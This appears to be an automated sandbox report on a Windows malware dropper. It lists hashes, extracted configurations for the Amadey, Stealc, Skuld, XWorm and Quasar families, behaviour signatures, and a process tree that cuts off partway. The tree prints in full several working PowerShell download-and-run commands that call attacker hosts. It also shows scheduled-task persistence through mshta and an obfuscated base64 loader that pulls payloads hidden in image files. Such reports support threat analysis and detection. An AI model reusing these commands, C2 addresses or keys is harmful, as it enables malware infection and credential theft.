Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 16:29

General

  • Target

    random.exe3.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 5 IoCs
  • Skuld family
  • Skuld stealer

    An info stealer written in Go lang.

  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 22 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 16 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3016
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:12864
    • C:\Users\Admin\AppData\Local\Temp\random.exe3.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe3.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3588
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:32
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4724
          • C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE
            "C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:5344
              • C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe
                "C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:2780
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c 1.bat && 2.js
                  7⤵
                  • Checks computer location settings
                  • Modifies registry class
                  • Suspicious use of WriteProcessMemory
                  PID:2140
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic cpu get name
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4140
                  • C:\Windows\system32\find.exe
                    find "QEMU"
                    8⤵
                      PID:2036
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2896
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                        9⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4104
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          10⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3108
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                      8⤵
                        PID:3756
                  • C:\Users\Admin\AppData\Local\Temp\10301270101\caa2ad40ee.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301270101\caa2ad40ee.exe"
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:5280
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c schtasks /create /tn EGXZCmagcnw /tr "mshta C:\Users\Admin\AppData\Local\Temp\VWrIVfEtO.hta" /sc minute /mo 25 /ru "Admin" /f
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:2372
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn EGXZCmagcnw /tr "mshta C:\Users\Admin\AppData\Local\Temp\VWrIVfEtO.hta" /sc minute /mo 25 /ru "Admin" /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:112
                    • C:\Windows\SysWOW64\mshta.exe
                      mshta C:\Users\Admin\AppData\Local\Temp\VWrIVfEtO.hta
                      7⤵
                      • Checks computer location settings
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:5528
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FCAU5XJIC5CW9V3PJEOFQMP8KTO6TRYN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                        8⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4116
                        • C:\Users\Admin\AppData\Local\TempFCAU5XJIC5CW9V3PJEOFQMP8KTO6TRYN.EXE
                          "C:\Users\Admin\AppData\Local\TempFCAU5XJIC5CW9V3PJEOFQMP8KTO6TRYN.EXE"
                          9⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2860
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10301280121\am_no.cmd" "
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:216
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 2
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:4916
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2432
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1788
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:1396
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
